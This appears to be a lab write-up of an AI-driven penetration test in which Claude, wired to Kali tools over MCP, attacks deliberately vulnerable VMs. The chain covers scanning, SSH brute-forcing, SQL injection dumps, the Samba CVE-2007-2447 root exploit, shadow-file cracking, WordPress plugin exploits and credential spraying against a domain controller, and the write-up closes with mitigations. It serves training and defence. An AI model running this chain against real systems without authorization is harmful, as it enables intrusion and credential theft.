Automated Penetration Testing with Claude AI: A Natural‑Language‑Driven End‑to‑End Attack Chain

Phase 1: Build MCP‑Kali integration

Install the MCP server package on the Kali host: sudo apt install mcp-kali-server Edit ~/.config/Claude/claude_desktop_config.json to register the server:

{"mcpServers":{"kali-tools":{"command":"mcp-server","args":[]}}}

Install Claude Desktop from its APT repository:

curl -fsSL https://pkg.claude-desktop-debian.dev/KEY.gpg | sudo gpg --dearmor -o /usr/share/keyrings/claude-desktop.gpg
echo "deb [signed-by=/usr/share/keyrings/claude-desktop.gpg arch=amd64,arm64] https://pkg.claude-desktop-debian.dev stable main" | sudo tee /etc/apt/sources.list.d/claude-desktop.list
sudo apt update && sudo apt install claude-desktop

After restarting Claude Desktop the kali-tools server appears as running. Claude lists the available capabilities (nmap, nikto, gobuster, dirb, hydra, sqlmap, metasploit, john, enum4linux, etc.) and confirms server health.

Phase 2: Reconnaissance and enumeration

Nmap scan

Fast‑mode scan with service version detection on the Metasploitable host (192.168.1.14):

execute_command nmap_scan against 192.168.1.14 in fast mode, performing service version detection and executing default NSE scripts

Results show:

Anonymous FTP running vsftpd 2.3.4 with backdoor

Plain‑text Telnet

SMTP supporting weak SSLv2

Samba 3.0.20 with remote‑code‑execution vulnerability (CVE‑2007‑2447)

Web directory enumeration

Gobuster scan of the DVWA application:

execute_command gobuster_scan http://192.168.1.14/dvwa/

Identifies HTTP 200 resources, 301 redirects and seven active endpoints, including an unauthenticated /setup page, a php.ini leak and the login page.

DIRB scan for confirmation:

execute dirb_scan against http://192.168.1.14/dvwa/ and display only the directories or files that return an HTTP 200 OK response

Filters to the same seven endpoints.

SMB enumeration

Enum4linux scan of the Samba service: execute_command enum4linux_scan 192.168.1.14 First attempt times out; a retry with adjusted parameters returns host name, vulnerable Samba version, workgroup and an anonymous share ( tmp) that reveals 35 user accounts, including root and msfadmin.

SSH credential brute‑force

Hydra attack against the SSH service on the SQLI‑Labs host (192.168.1.15) using local users.txt and password.txt dictionaries:

execute_command hydra_attack to test SSH logins on 192.168.1.15 using the usernames from users.txt and passwords from password.txt

After testing 42 credential pairs (≈34 s) the pair pentest:123 is recovered and a ready‑to‑use SSH command is returned.

Phase 3: Exploitation

SQL injection

Sqlmap scan of the vulnerable endpoint on SQLI‑Labs:

execute_command sqlmap_scan on http://192.168.1.15/Less-1/

Confirms a MySQL backend and four injection techniques (boolean, error, time, UNION). Five databases are enumerated; the security database is marked as primary. Four tables are dumped, extracting 13 clear‑text username/password pairs.

Metasploit port scan

Metasploit auxiliary TCP port scanner against Metasploitable (ports 1‑1024):

execute_command metasploit_scan port scan on 192.168.1.14

Open services reported: FTP, SSH, Telnet, SMTP, DNS, HTTP, RPCbind, NetBIOS, SMB.

Samba RCE (CVE‑2007‑2447)

Use the usermap_script exploit to obtain a root shell:

use Samba usermap_script (CVE-2007-2447) on port 445 lhost=192.168.1.17

The session persists as a cmd/unix shell with uid=0(root).

Phase 4: Post‑exploitation and credential cracking

Shadow file extraction

With root access, read /etc/shadow. All password hashes use the legacy MD5‑crypt format ( $1$ prefix), making them relatively easy to crack.

John the Ripper

Crack the hashes using the rockyou.txt dictionary. Claude runs an iterative approach: a trimmed dictionary for speed, then the full list for completeness.

execute_command john_crack on hashes using rockyou.txt file

Six of seven passwords are recovered (86 % success); only root remains unrecovered.

Phase 5: Compromise WordPress target

WPScan enumeration

Run WPScan against the WordPress VM (192.168.1.16):

execute_command wp_scan http://192.168.1.16/wordpress/

Identifies WordPress 5.2.24, two valid users ( admin, aarti), seven plugins (including vulnerable reflex-gallery and mail-masta), and misconfigurations such as exposed phpinfo.php and readme.html.

Reflex‑Gallery exploit (CVE‑2015‑4133)

Upload a PHP payload via the unauthenticated file‑upload flaw using Metasploit: exploit reflex-gallery Establishes a Meterpreter session as www-data.

Mail‑Masta exploit (CVE‑2016‑10956)

Manual LFI to read /etc/passwd, revealing root and raj. Then retrieve wp-config.php via a PHP filter wrapper to obtain database credentials.

exploit mail-masta

Privilege escalation to WordPress admin

Using the extracted database credentials, reset the admin password to admin:hacked123 and log into the WordPress dashboard, gaining full control over posts, plugins, themes and the underlying server.

Phase 6: Operational tooling

Health check

Claude reports the MCP server as healthy and lists tool status:

nmap, nikto, dirb, gobuster – API down but still callable via execute_command hydra, sqlmap, metasploit, john, enum4linux – operational

Command reference

Requesting help returns a quick‑reference table grouped into scanning ( nmap_scan, nikto_scan, dirb_scan, gobuster_scan, enum4linux_scan, wp_scan), exploitation ( sqlmap_scan, hydra_attack, metasploit_scan, use, exploit) and post‑exploitation ( john_crack, sessions, dump shadow) commands.

Phase 7: Pivot to Windows domain controller

NetExec SMB authentication

Use NetExec (nxc) with the same user/password lists to test SMB authentication on the Windows Server 2019 DC (192.168.1.18):

execute_command nxc to test smb authentication on 192.168.1.18 with the usernames listed in users.txt and the passwords listed in password.txt

Out of 56 credential combinations only administrator:Ignite@987 succeeds, granting full SMB (445) and WinRM (5985) administrator access.

Mitigation strategies

Patch and retire stale software : Upgrade or decommission unsupported services such as Samba 3.0.20 (CVE‑2007‑2447), vsftpd 2.3.4, Apache 2.2.8, PHP 5.2.4 and outdated WordPress core/plugins.

Disable anonymous and default access : Turn off anonymous FTP and SMB empty sessions, remove public management interfaces (phpMyAdmin, phpinfo.php, readme.html), and disable directory indexing, HTTP TRACE and XML‑RPC.

Enforce strong authentication : Require long, unique, complex passwords, lock accounts after failed attempts, rate‑limit logins and enable multi‑factor authentication. Replace MD5‑crypt hashes with bcrypt/Argon2.

Secure web applications : Use parameterized queries, input validation, a Web Application Firewall, restrict file‑upload types and permissions, disable allow_url_include, and run database accounts with least privilege.

Network hardening and continuous monitoring : Segment networks, apply least‑privilege firewall rules, block outbound connections from compromised hosts, enforce SMB signing, deploy centralized logging, IDS/EDR and monitor for scanning or brute‑force activity.